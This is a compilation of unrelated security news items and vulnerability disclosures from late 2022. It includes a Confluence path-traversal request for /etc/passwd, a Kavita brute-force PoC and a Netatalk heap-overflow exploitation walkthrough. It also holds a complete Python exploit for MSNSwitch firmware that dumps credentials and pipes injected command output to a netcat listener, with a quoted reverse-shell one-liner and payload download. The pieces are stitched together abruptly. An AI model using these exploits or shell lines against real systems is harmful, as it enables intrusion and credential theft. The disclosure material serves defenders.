Apple Security Advisory 2022-11-09-1 - iOS 16.1.1 and iPadOS 16.1.1 addresses code execution and integer overflow vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-11-09-1 iOS 16.1.1 and iPadOS 16.1.1iOS 16.1.1 and iPadOS 16.1.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213505.libxml2Available for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: An integer overflow was addressed through improved inputvalidation.CVE-2022-40303: Maddie Stone of Google Project Zerolibxml2Available for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: This issue was addressed with improved checks.CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google ProjectZeroAll information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNsFNIACgkQ4RjMIDkeNxl2og/7Bwq+DwNmc4conLeNZ/4RVZ8Abf2kKMj71ZJrSov1lvW6W9l3NswznKc9pV0Cack8zm1she6dr+HNMYFcsSbFF/OTPKsf2jlZ3aZY5on7FpDdzB8bLDbw0dvSnO2Oc1mgcsBMIuSJBliUfgF0d6L6Hrj7L8Ja0pQP0W5BhcbWbd91wgj2KAQpaX6rgh7oEy7W5GRPJwLAdOfHmpzWws+PjZ3DMlLuGvGRLwEyizsLbq6rX166KG+asXZzCeWygTuKKcpZHG6FwahogBFnfl1ccTGJv4UV/9Ks3WEaZCGx5lpkgw+5H9Wx2HgXTr9Sh01CQVADadfeGp/Iat0TE2hscMZaTm2A1ZdmOeyK70r0jXvCCHtna9spbPO7N0OBERsqS9fC+X/XVHuehIzoUXxFUJAuaXD2weBZHJZBZ7MoUqNm50taDqoYUX0yB2BU0uWOitKfghLRBuFhpuUZtRaZdRfDLSEjSxCTCtGwWnIj4lLlZbE9RAwNNCU12+z6pHHlTxZ9c6IiQF8mrIx4IJ0OMIk6oH3gm71l8T5FSMiLCcuInL0XwC5ragJ/irrxq3GuXL8x+3BjgxnRy4kKy6KUwZsLFp7OI71X/hyjEIyhcXopiRz0PXrooluRUtooyxSCV8M9u3658pFT2+X4WvQASmk3z+ZUnTBQXrfNgWkxyUs=JERa-----END PGP SIGNATURE-----

Apple Security Advisory 2022-11-09-1

In the Netic User Export add-on before 1.3.5 for Atlassian Confluence, authorization is mishandled. An unauthenticated attacker could access files on the remote system.

Vulnerability Type: Unauthenticated Arbitrary File Read

Vendor of Product: Atlassian Confluence

Affected Product Code Base: User Export for Confluence

Product Version: < 1.3.5

Description: The Netic User Export add-on before 1.3.5 for Atlassian Confluence has the functionality to generate a list of users in the application, and export it. During export, the HTTP request has a fileName parameter that accepts any file on the system (e.g., an SSH private key) to be downloaded.

Attack Vectors: Attacker could make an HTTP request to the affected endpoint and download any file from the system.

Attack Type: Remote

Endpoint: /plugins/servlet/confluenceuserexport/admin/download

Assigned CVE-ID: CVE-2022-42977, CVE-2022-42978

Steps To Reproduce

1\. Issue a HTTP POST/GET request to the following endpoint: https://<confluence.example.com>/plugins/servlet/confluenceuserexport/admin/download?fileName=\[file-path\]

#PoC

\[REQUEST\]

GET /plugins/servlet/confluenceuserexport/admin/download?fileName=../../../../../../etc/passwd HTTP/1.1

Host: confluence.example.local

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

\[RESPONSE\]

HTTP/1.1 401

Set-Cookie: JSESSIONID=ABCDEFGHIJKLMNOPQRSTUVWYZ; Path=/; HttpOnly

WWW-Authenticate: OAuth realm="confluence.example.local"

Content-Disposition: attachment; filename=../../../../../etc/os-release

Content-Type: text/html;charset=UTF-8

Content-Length: 407

Not AuthorizedNAME="CentOS Linux"

VERSION="7 (Core)"

ID="centos"

CVE-2022-42978: Unauthenticated Arbitrary File Read

Authentication Bypass by Primary Weakness in GitHub repository kareadita/kavita prior to 0.6.0.3.

The migrate-email endpoint is requiring Email, Username, and Password parameter. This endpoint contain authentication functionality that doesn't have any protection from brute-force attack, which allows an attacker to try every possible password combination without any restriction.

**CWE-307: Improper Restriction of Excessive Authentication Attempts****POC****1\. Send this request to Burpsuite Intruder**

    POST /api/account/migrate-email HTTP/1.1
    Host: 192.168.189.132:5000
    Accept: application/json, text/plain, */*
    DNT: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
    Referer: http://192.168.189.132:5000/admin/dashboard
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,id-ID;q=0.8,id;q=0.7,ar-SA;q=0.6,ar;q=0.5
    Connection: close
    Content-Type: application/json
    Content-Length: 67
    
    {"Email":"xxx@local.com",
    "Username":"admin",
    "Password":"xxx"
    }
    

**2\. Mark on the Password value**

**3\. Bruteforce attack with 1000 password list and get valid admin password**

**Impact**

An attacker could perform a brute-force attack targeting normal and administrative users, using different passwords and eventually gain access to the targeted account, without any restriction.

CVE-2022-3993: No Rate Limit On migrate-email Endpoint Leads to Brute-force Attack in kavita

Netatalk through 3.1.13 has an afp_getappl heap-based buffer overflow resulting in code execution via a crafted .appl file. This provides remote root access on some platforms such as FreeBSD (used for TrueNAS).

5 minute read

**TL;DR**

Hi all, This is my first blog in this page. Actually this is my second blog, but first one is missed on the previous website. I will push it again in this page. Please feed free comment or create issue in github if you detect my misstakes.

**Overview**

Oftenly, I found a product from pwn2own to audit. I found an amazing blog which discription about CVE-2022-23121 in Pwn2own. I tried to audit the source code of Netatalk 3.1.13 to understand the vulnerability clearly. Of couse with a hope to find a new vulnerability for next Pwn2own.

**Vulnerability**

When finding new bug, I often focus to memory corruption, so I find some function like memcpy, strcpy, … Because the Netatalalk works with specific protocol (AFP) and file formats. Moreover, CVE-2022-23121 occurs when parsing .AppleDouble file. Therefore I found some other file format and found .appl. The function to read .appl file is afp_getappl:

        /* fake up a cname */
        cbuf = obj->newtmp;
        q = cbuf;
        *q++ = 2;	/* long path type */
        *q++ = (unsigned char)len;
        memcpy( q, p, len );
    

afp_getappl also has:

        buf = obj->oldtmp;
        while (( cc = read( sa.sdt_fd, buf, sizeof( appltag )
                            + sizeof( u_short ))) > 0 ) {
            p = buf + sizeof( appltag );
            memcpy( &len, p, sizeof( len ));
            len = ntohs( len );
            p += sizeof( u_short );
            if (( cc = read( sa.sdt_fd, p, len )) < len ) {
                break;
            }
            if ( sa.sdt_index == aindex ) {
                break;
            }
            sa.sdt_index++;
        }
        if ( cc <= 0 || sa.sdt_index != aindex ) {
            *rbuflen = 0;
            return( AFPERR_NOITEM );
        }
        sa.sdt_index++;
    

We can see len variable parse from 2 bytes (u_short types) and read len bytes to some buffer afterward. we also need understand obj (is object of AFPObj):

    typedef struct AFPObj {
        const char *cmdlineconfigfile;
        int cmdlineflags;
        const void *signature;
        struct DSI *dsi;
        struct afp_options options;
        dictionary *iniconfig;
        char username[MAXUSERLEN];
        /* to prevent confusion, only use these in afp_* calls */
        char oldtmp[AFPOBJ_TMPSIZ + 1], newtmp[AFPOBJ_TMPSIZ + 1];
        void *uam_cookie; /* cookie for uams */
        struct session_info  sinfo;
        uid_t uid;  /* client login user id */
        uid_t euid; /* client effective process user id */
        int ipc_fd; /* anonymous PF_UNIX socket for IPC with afpd parent */
        gid_t *groups;
        int ngroups;
        int afp_version;
        int cnx_cnt, cnx_max;
        /* Functions */
        void (*logout)(void);
        void (*exit)(int);
        int (*reply)(void *, int);
        int (*attention)(void *, AFPUserBytes);
        int fce_version;
        char *fce_ign_names;
        char *fce_notify_script;
        struct sl_ctx *sl_ctx;
    } AFPObj;
    

with AFPOBJ_TMPSIZ is 4096 as default, len is 0xffff as max, so we have a heap-based buffer overflow at here.

**Exploit**

Between parsing len and call memcpy like above, afp_getappl have one more piece:

       {
    #define hextoint( c )	( isdigit( c ) ? c - '0' : c + 10 - 'a' )
    #define islxdigit(x)	(!isupper(x)&&isxdigit(x))
    
            char	utomname[ MAXPATHLEN + 1];
            char		*u, *m;
            int		i, h;
    
            u = p;
            m = utomname;
            i = len;
            while ( i ) {
                if ( *u == ':' && *(u+1) != '\0' && islxdigit( *(u+1)) &&
                        *(u+2) != '\0' && islxdigit( *(u+2))) {
                    ++u, --i;
                    h = hextoint( *u ) << 4;
                    ++u, --i;
                    h |= hextoint( *u );
                    *m++ = h;
                } else {
                    *m++ = *u;
                }
                ++u, --i;
            }
    
            len = m - utomname;
            p = utomname;
    
            if ( p[ len - 1 ] == '\0' ) {
                len--;
            }
        }
    

Basically, the above code will copy and decode byte by byte from p to a buffer in stack. If I exploit stack buffer overflow in m to override return address, overlap memory will be occured. Therefore so hard to control addresses. Therefore, I tried to find to bypass it.

I decided using

        while (( cc = read( sa.sdt_fd, buf, sizeof( appltag )
            ...
            if (( cc = read( sa.sdt_fd, p, len )) < len ) 
    

to overflow buffer p (point to obj->oldtmp + 6) in the first piece code which I showed above and using

        if ( cc <= 0 || sa.sdt_index != aindex ) {
            *rbuflen = 0;
            return( AFPERR_NOITEM );
        }
    

to break loop and exit function without reaching decoding byte to byte. Becasue aindex is parsed from AFP packet, I try to set it to some values (different 0 and 1) and it worked :))).

Finally, we need trigger shell and run command, I do not use any House of ... because I am so noob :((, so I tried to override address at end of AFPObj. In first try, I tried override reply or exit function pointer in obj. I found send_reply function call:

        obj->reply(obj->dsi, err);
        obj->exit(0);
    

But noway to control argument. Luckily I found that send_fce_event function will check obj->fce_notify_script and run command:

        bstring cmd = bformat("%s -v %d -e %s -i %" PRIu32 "",
                              obj->fce_notify_script,
                              FCE_PACKET_VERSION,
                              fce_event_names[event],
                              event_id);
        (void)afprun_bg(1, bdata(cmd));
    

and afprun_bg:

    int afprun_bg(int root, char *cmd){
        ...
        execl("/bin/sh","sh","-c", cmd, NULL);
        ...
    

I override the *fce_notify_script with pointer which point to command. It is easy to indentify because AFPObj is saved on .bss segment.

**Exploit strategy**

I found that .appl file will be stored in current sharing dictionary if having config (vol dbnest = yes) and it is default setting in FreeBSD. It means, this is RCE vulnerability in FreeBSD and LPE in other OS. I create a demo in TrueNAS with guest allow and SMB enable.

Checksec of afpd:

        Arch:     amd64-64-little
        RELRO:    Partial RELRO
        Stack:    Canary found
        NX:       NX enabled
        PIE:      No PIE (0x200000)
        RUNPATH:  b'/usr/local/lib'
    

1.  Create pre .appl file with:
    *   len is over 4096 and contain length of command and padding in AFPObj ( = (fce_off+8*3).to_bytes(2, 'big'))
    *   command to run
    *   padding with \x00 in fce_off-len(cmd) times.
    *   fce_version is 1
    *   address point command.
2.  using SMB to update and modify the .appl file in local in ./AppleDouble/<x>/<xyzt>.appl
3.  Send AFP packet afp_getappl with aindex is a big number (like 10, 15)
4.  Trigger excute command send AFP packet afp_logout

**Conclusion**

With hoping get a bounty because Netatalk appeared in Pwn2own 2021, I tried report this vulnerability to zdi, TrueNAS, Synology. But noone resolve this. After a half of year, I decided public this blog and no bounty :((.

CVE-2022-45188: [1day to 0day] Netatalk from Pwn2own 2021 to 0x00 cent in 2022

Bug emerges from ambition to find ‘end-to-end exploits beyond DoS’

Adam Bannister 11 November 2022 at 15:37 UTC

Bug emerges from ambition to find ‘end-to-end exploits beyond DoS’

A prototype pollution vulnerability that could lead to remote code execution (RCE) in Parse Server has been patched.

An attacker could potentially trigger RCE through the MongoDB BSON \[Binary JSON\] parser by leveraging the flaw (CVE-2022-39396), according to a GitHub security advisory published on November 8.

Parse Server is a popular, open source API server module for Node.js that provides push notification functionality for iOS, macOS, Android, and tvOS.

BACKGROUND Prototype pollution: A dangerous and underrated vulnerability impacting JavaScript applications

Although the security researchers involved are withholding technical details to give developers time to apply patches, so the detail remains unclear, we know the bug is comparable to another prototype pollution-to-RCE issue they disclosed earlier in the year. That vulnerability – which surfaced in March 2022 – was given the highest possible severity rating of CVSS 10.

**Patch now**

“I can confirm that both vulnerabilities have the highest impact because they affect the default configuration of Parse Server and allow an attacker to control the system remotely without any authentication,” Mikhail Shcherbakov, a researcher from the KTH Royal Institute of Technology in Stockholm, told The Daily Swig. “So my advice is to patch Parse Server ASAP, if you have it.”

The flaw has been patched in the NPM parse-server package in versions 4.10.18 and 5.3.1.

The patches prevent prototype pollution in the MongoDB database adapter. If updates cannot be applied immediately, then users can protect themselves in the meantime by disabling RCE through the MongoDB BSON parser.

**‘Complex task’**

The flaw was discovered during a research project undertaken by Shcherbakov, KTH colleague Musard Balliu, and Cristian-Alexandru Staicu from the Helmholtz Center for Information Security (CISPA) in Saarbrücken, Germany.

The trio investigated how prototype pollution vulnerabilities in Node.js systems might lead to RCE attacks.

“The detection of prototype pollution is a complex task,” said Shcherbakov. “However, the exploitation that demonstrates a high impact of vulnerabilities is more complicated in practice but still possible.”

The researchers have presented their findings, which also feature Node.js targets NPM CLI and Rocket.Chat, in a white paper (PDF). They are due to present their research at the USENIX Security ’23 conference.

**Universal gadgets**

Prototype pollution, which affects Node.js and prototype-based languages like JavaScript, involves injecting “properties into an object’s root prototype at runtime \[to\] subsequently trigger the execution of legitimate code gadgets that access these properties on the object’s prototype,” explains the presentation precis.

The researchers set out to find “end-to-end exploits beyond DoS in full-fledged Node.js applications”, and “the first multi-staged framework that uses multi-label static taint analysis to identify prototype pollution in Node.js libraries and applications, as well as a hybrid approach to detect universal gadgets”.

Technical details for the Parse Server RCE will eventually be disclosed via the Trend Micro Zero Day Initiative (ZDI) blog.

Other significant security bugs addressed in Parse Server this year include an issue that enabled brute-force guessing of sensitive user data, and a high severity authentication bypass impacting Apple Game Center.

RELATED Prototype pollution bug exposed Ember.js applications to XSS

Prototype pollution project yields another Parse Server RCE

Two long-running surveillance campaigns have been found targeting the Uyghur community in China and elsewhere with Android spyware tools designed to harvest sensitive information and track their whereabouts.
This encompasses a previously undocumented malware strain called BadBazaar and updated variants of an espionage artifact dubbed MOONSHINE by researchers from the University of Toronto's

Two long-running surveillance campaigns have been found targeting the Uyghur community in China and elsewhere with Android spyware tools designed to harvest sensitive information and track their whereabouts.

This encompasses a previously undocumented malware strain called BadBazaar and updated variants of an espionage artifact dubbed MOONSHINE by researchers from the University of Toronto's Citizen Lab in September 2019.

"Mobile surveillance tools like BadBazaar and MOONSHINE can be used to track many of the 'pre-criminal' activities, actions considered indicative of religious extremism or separatism by the authorities in Xinjiang," Lookout said in a detailed write-up of the operations.

The BadBazaar campaign, according to the security firm, is said to date as far back as late 2018 and comprise 111 unique apps that masquerade as benign video players, messengers, religious apps, and even TikTok.

While these samples were distributed through Uyghur-language social media platforms and communication channels, Lookout noted it found a dictionary app named "Uyghur Lughat" on the Apple App Store that communicates with a server used by its Android counterpart to gather basic iPhone information.

The iOS app continues to be available on the App Store.

"Since BadBazaar variants often acquire their surveillance capabilities by downloading updates from their \[command-and-control server\], it is possible the threat actor is hoping to later update the iOS sample with similar surveillance functionality," the researchers pointed out.

BadBazaar, once installed, comes with several features that allow it to collect call logs, GPS locations, SMS messages, and files of interest; record phone calls; take pictures; and exfiltrate substantial device metadata.

Further analysis of BadBazaar's infrastructure has revealed overlaps with another spyware operation aimed at the ethnic minority that came to light in July 2020 and which made use of an Android toolset called DoubleAgent.

Attacks employing MOONSHINE, in a similar vein, have employed over 50 malicious apps since July 2022 that are engineered to amass personal data from the infected devices, in addition to recording audio and downloading arbitrary files.

"The majority of these samples are trojanized versions of popular social media platforms, like WhatsApp or Telegram, or trojanized versions of Muslim cultural apps, Uyghur-language tools, or prayer apps," the researchers said.

Prior malicious cyber activities leveraging the MOONSHINE Android spyware kit have been attributed to a threat actor tracked as POISON CARP (aka Evil Eye or Earth Empusa), a China-based nation-state collective known for its attacks against Uyghurs.

The findings come a little over a month after Check Point disclosed details of another long-standing surveillanceware operation aimed at the Turkic Muslim community that deployed a trojan named MobileOrder since at least 2015.

"BadBazaar and these new variants of MOONSHINE add to the already extensive collection of unique surveillanceware used in campaigns to surveil and subsequently detain individuals in China," Lookout said.

"The wide distribution of both BadBazaar and MOONSHINE, and the rate at which new functionality has been introduced indicate that development of these families is ongoing and that there is a continued demand for these tools."

The development also follows a report from Google Project Zero last week, which uncovered evidence of an unnamed commercial surveillance vendor weaponizing three zero-day security flaws in Samsung phones with an Exynos chip running kernel version 4.14.113. The security holes were plugged by Samsung in March 2021.

That said, the search giant said the exploitation mirrored a pattern similar to recent compromises where malicious Android apps were abused to target users in Italy and Kazakhstan with an implant referred to as Hermit, which has been linked to Italian company RCS Lab.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Experts Uncover Two Long-Running Android Spyware Campaigns Targeting Uyghurs

MSNSwitch Firmware MNT.2408 suffers from a remote code execution vulnerability.

    Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)Google Dork: n/aDate:9/1/2022Exploit Author: Eli FulkersonVendor Homepage: https://www.msnswitch.com/Version: MNT.2408Tested on: MNT.2408 firmwareCVE: CVE-2022-32429#!/usr/bin/python3"""POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.Configuration dump only requires HTTP access.Full RCE requires you to be on the same subnet as the device.""" import requestsimport sysimport urllib.parseimport readlineimport randomimport string# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOSTLISTENER_HOST = "192.168.EDIT.ME"LISTENER_PORT = 3434# target msnswitchTARGET="192.168.EDIT.ME2"PORT=80USERNAME = NonePASSWORD = None"""First vulnerability, unauthenticated configuration/credential dump"""if USERNAME == None or PASSWORD == None:  # lets just ask  hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"  session = requests.session()  data = session.get(hack_url)  for each in data.text.split('\n'):    key = None    val = None    try:      key = each.strip().split('=')[0]      val = each.strip().split('=')[1]    except:      pass    if key == "Account1":      USERNAME = val    if key == "Password1":      PASSWORD = val"""Second vulnerability, authenticated command executionThis only works on the local lan.for full reverse shell, modify and upload netcat busybox shell script to /tmp:  shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f  download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmpref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox"""session = requests.session()# initial login, establishes our Cookieburp0_url = f"http://{TARGET}:{PORT}/goform/login"burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}session.post(burp0_url, headers=burp0_headers, data=burp0_data)# get our csrftokenburp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"data = session.get(burp0_url)csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]while True:  CMD = input('x:')  CMD_u = urllib.parse.quote_plus(CMD)  filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))  try:    hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}"    session.get(hack_url, timeout=0.01)  except requests.exceptions.ReadTimeout:    pass

MSNSwitch Firmware MNT.2408 Remote Code Execution

By Deeba Ahmed
Dubbed StrelaStealer, the malware is being distributed through malicious email attachments and targets Spanish-speaking people.
This is a post from HackRead.com Read the original post: StrelaStealer Malware Hijacking Outlook and Thunderbird Accounts

The cyber security researchers at DCSO CyTec have discovered a brand-new information-stealing malware targeting Outlook and Thunderbird emails.

Dubbed StrelaStealer, the malware acts just like any other info stealer and tries to steal data from browsers, cloud gaming apps, cryptocurrency wallet apps, the clipboard, and other sources. However, what’s unique about this campaign is that the malware steals data from Thunderbird and Outlook accounts and targets Spanish-speaking people.

**Attack Chain Analysis**

The malware was detected earlier this month. The attack chain involves sending email attachments to the targeted user. These attachments contain ISO files. When a user clicks on the file, it opens an executable (msinfo32.exe). It then sideloads the bundled malware through DLL order hijacking.

The malicious email used in the campaign

In some cases, the ISO contains a .lnk file (Factura.Ink) and an HTML document that’s a polyglot file (x.html). Such as, when you open an HTML file on a web browser, you will see a text document, and when it is opened via an executable, it installs the payload.

1.  VirusTotal Reveals Apps Most Exploited to Spread Malware
2.  Urlscan.io API Inadvertently Leaked Sensitive Data and URLs
3.  Microsoft Office Most Exploited Software in Malware Attacks
4.  Apple Safari Safest, Google Chrome Riskiest Browser of 2022
5.  Top 10 Android Educational Apps That Collect Most User Data

**How does the Attack Works?**

When the user clicks on the .lnk file, it executes the x.html twice. First, it executes it using rundll32.exe and opens the embedded StrelaStealer DLL. Then it opens the HTML file in the device’s default browser to reveal a decoy document.

While the user is busy checking this document, the info stealer starts its malicious tasks in the background. Such as, it searches for login.json and key4.db in %APPDATA%\\Thunderbird\\Profiles\\ directory for stealing account credentials.

In Outlook’s case, the malware accesses the Windows Registry and steals the software’s key, after which it inspects the IMAP User, IMAP Password, and IMAP Server values. If found, the malware exfiltrates the content to a C2 server controlled by the attacker.

Then it waits for the attacker’s response. If received, the malware quits. If not, it repeats the routine after a 1-second sleep session.

In conclusion, email attachments can be a great way to share information and files with others, but they can also be a source of malware. By following some simple guidelines, you can protect yourself from malicious email attachments.

First, never open an attachment from someone you don’t know. If you’re not expecting an attachment from the sender, be wary of opening it. Second, always scan attachments for viruses before opening them. Many email programs will do this automatically, but if yours doesn’t, there are many free virus scanners available online.

Finally, make sure you have an updated security solution installed on your system. One can also use VirusTotal to scan malicious files and URLs.

StrelaStealer Malware Hijacking Outlook and Thunderbird Accounts

Anyone can get a blue tick on Twitter without proving who they are. And it’s already causing a ton of problems.

At the end of August, Sean Murphy was trying to book a flight between Nairobi, Kenya, and Entebbe, Uganda, with Kenya Airways. “The information on the booking page was ambiguous,” says Murphy, the cofounder of Web3 company ImpactScope. So he fired off a quick direct message to the verified Kenya Airways account on Twitter, asking it to confirm baggage allowances for the flight. A day later, when the account didn’t reply, he sent the company a public tweet reminding it about the question. Then the replies started.

Within minutes, multiple Twitter accounts claiming to be Kenya Airways tweeted him. All of them offered help, but none of them appeared official. The accounts used Kenya Airways’ logo and slogan, but clicking on their profiles raised red flags. “Most of their messages were well crafted,” Murphy says. “However, the low number of followers coupled with the spelling errors or odd choice of characters in their actual Twitter handles was the main giveaway.” The accounts included “@\_1KenyaAirways” and “@kenyaairways23.”

It’s now easier for Twitter accounts to appear official. In the chaotic days since Elon Musk completed his $44 billion takeover of Twitter and subsequently fired thousands of staff, the social network has revamped how its account verification works. The new Twitter Blue subscription, which has started rolling out to some users, allows anyone to pay $8 per month and get a blue check mark showing they are “verified.” The tick appears almost instantly once someone stumps up the cash, and no questions are asked—people do not have to prove their identity.

The verification symbol is a stark difference from Twitter’s previous approach to verification when only accounts belonging to brands, public figures, and governments were provided with blue ticks next to their name. In all those instances, verification was approved by Twitter staff. The new verification process—or lack of it—is likely to make it easier for scammers, cybercriminals, and peddlers of disinformation to hone their craft and appear legitimate.

“Cybercriminals very easily use social media as the perfect vehicle to target unbeknown victims, but when there is no clear and genuine way to check identities, you open up a path to impersonated accounts, which will no doubt be abused by threat actors in the search of a con,” says Jake Moore, global cybersecurity advisor at security firm ESET.

Things are already messy. Straight after Twitter Blue’s verification started rolling out, accounts impersonating people and brands appeared. Some people appeared to be testing the system; others were causing trouble. In some cases, new accounts were used, and in others, years-old Twitter accounts had been converted to blue-tick status. One account called Nintendo of America (handle: @nIntendoofus) tweeted a picture of Mario giving people the finger. Apple TV+ was impersonated along with gaming firm Valve, Donald Trump, and basketball star LeBron James. A post from an account pretending to be an ESPN analyst gained more than 10,000 engagements before it was deleted, fact-checking organization Snopes reported. The account had “NOT” in its handle, and its bio described it as a parody. As of yesterday, amid a surge of impersonation accounts, Twitter had paused allowing new accounts to purchase verification.

Twitter’s new approach to verified accounts is focused on the Twitter Blue subscription. Once a user pays, the blue tick appears next to an account’s name. If someone clicks on the tick, a message explains it is there because it has been purchased. In Twitter’s timeline, a user’s blue tick is shown prominently next to the name they give their account (which can easily be changed), rather than their username handle.

Cybercriminals have, of course, tried to scam people or impersonate them on social media for years, and they are always trying to stay one step ahead of the people hunting them down. Many scams involve convincing people that an account is authentic and then manipulating them via social engineering to hand over credit card details or personal information. These kinds of scams persist as criminals get results from them.

Support account scams—where a bad actor impersonates a company’s customer service team, as with Sean Murphy’s experience with Kenya Airways—are common. Kenya Airways’ official Twitter account has previously warned about accounts that impersonate it (one of these is not verified). Rachel Tobac, the cofounder of SocialProof security, which focuses on social engineering, says these support account scams will be easier to conduct on Twitter as there are fewer steps scammers need to take before they start impersonating official accounts.

“Previously, cybercriminals needed to procure a verified Twitter page by phishing the verified user to steal their credentials, buy stolen credentials online, or find the reused credentials in a password repository post data breach,” Tobac says. “Now the scammers can just use a stolen credit card to purchase a verified account and begin their scamming.” Millions of people’s credit card details can be purchased online and a single stolen card can cost just $1.

Musk has claimed that the $8 Twitter subscription fee will discourage bad actors from creating accounts, particularly at scale. The CEO has also said that accounts subscribing to Twitter Blue will have their tweets shown above non-verified accounts in search results. In a Twitter Space aimed at advertisers this week, Musk said he wanted to stop fake accounts and that bad actors “don’t have a million credit cards and phones.” (In one incident in February, Ukrainian officials shut down an alleged Russian-linked bot operation that used 3,000 SIM cards and had created more than 18,000 online accounts.)

Twitter also briefly launched and removed an “official” label that was placed on some public accounts. “Please note that Twitter will do lots of dumb things in coming months,” Musk tweeted this week. “We will keep what works & change what doesn’t.” (Twitter did not immediately respond to a request for comment, although it is believed many of its press office team were let go in the recent Twitter layoffs.)

Beyond allowing scammers to appear genuine, multiple experts believe that the verification changes could erode what it means for legitimate accounts to be verified on social media. “The shift to purchasing verified accounts will likely greatly reduce the trust that users, emergency services, public utilities, journalists, and brands have in Twitter verified accounts, as it’s unlikely that Twitter will quickly catch and shut down every new Twitter Blue verified account that is impersonating others,” Tobac says.

In addition to scams, the ability to quickly create genuine-looking verified accounts is also likely to aid disinformation campaigns. For years, Russian, Chinese, and Iranian state-supported actors have tried to manipulate many conversations online. They can create thousands of fake accounts in attempts to amplify disinformation. “We know that disinformation actors, particularly those that are linked to governments, have budgets,” says Elise Thomas, a senior OSINT analyst at the Institute for Strategic Dialogue who has focused on misinformation and disinformation. “We’ve already seen many disinformation campaigns buy web domains, spend thousands or tens of thousands on advertising, purchase bot accounts in bulk, and employ trolls.”

As noted by Eliot Higgins, the founder of the investigative unit Bellingcat, which among other things has uncovered Russian disinformation and exposed its network of international spies, it would be trivial for a government to pay for verified accounts. In 2018, Russia’s Internet Research Agency, which has consistently pumped out disinformation, had a budget of around $10 million. “Beyond impersonation of real people and organizations, it could also allow disinformation operations to create new personas—for example, journalists or government agencies that don’t exist—and make that fake persona seem more credible with a check mark,” Thomas says.

And state-backed actors haven’t needed verified marks to sow information chaos in the past. “Many state-backed disinformation campaigns use fake accounts to amplify user-generated content that is divisive and polarizing in order to get topics to trend, and to make voices at the fringe appear louder than they are,” says Samantha Bradshaw, an assistant professor in new technology and security at American University. “It is therefore unclear whether this policy will raise the cost of influence operations in a meaningful way.” Russian state-backed Twitter accounts have previously managed to be quoted in the press hundreds of times, without any verification at all.

As the rollout of Twitter Blue continues, staff at the newly cut Twitter may face an uphill battle in determining whether accounts are part of coordinated efforts to influence discourse online or are indeed authentic. Twitter’s own staff have hinted that verification without identity checks may have to change in the future. Yoel Roth, Twitter’s head of trust and safety, said that in the short term the company will “ramp up” proactive reviews of accounts that appear to be impersonating other people. “I think we need to invest more in identity verification as a complement to proof-of-humanness,” Roth tweeted. “Paid Verification is a strong (not perfect) signal of humanness, which helps fight bots and spam. But that’s not the same thing as identity verification.”

Elon Musk's Twitter Blue Verification Is a Gift to Scammers

By Deeba Ahmed
Microsoft has urged Windows Administrators to install the updates urgently so make sure you have the latest patches installed!
This is a post from HackRead.com Read the original post: Microsoft Issues Patches to Fix 6 Active 0-Day Windows Vulnerabilities

It is no surprise that Microsoft’s products are on the hit list of cyber attacks, given the steadily increasing number of **zero-day attacks against them**. It is the second time in two months that the reputed software maker has released patches to fix already exploited zero-days in its scheduled Patch Tuesday update. The company urged Windows Administrators to install the updates urgently.

 The details of these flaws and the subsequent fixes are as follows:

**Microsoft Fixes Crucial Flaws in Patch Tuesday Update**

According to the tech giant, in its monthly security update, Patch Tuesday, the company has released patches for 68 vulnerabilities, including six unique, actively exploited zero-days. These flaws were flagged in the Exploitation Category. This includes two fixes for **Exchange Server security flaws** that a state-sponsored entity exploited for several months.

Twelve flaws were marked Critical, two of which were rated High, whereas fifty-five were rated Important in severity. The company also released patches for weaknesses fixed the previous week by **OpenSSL**.

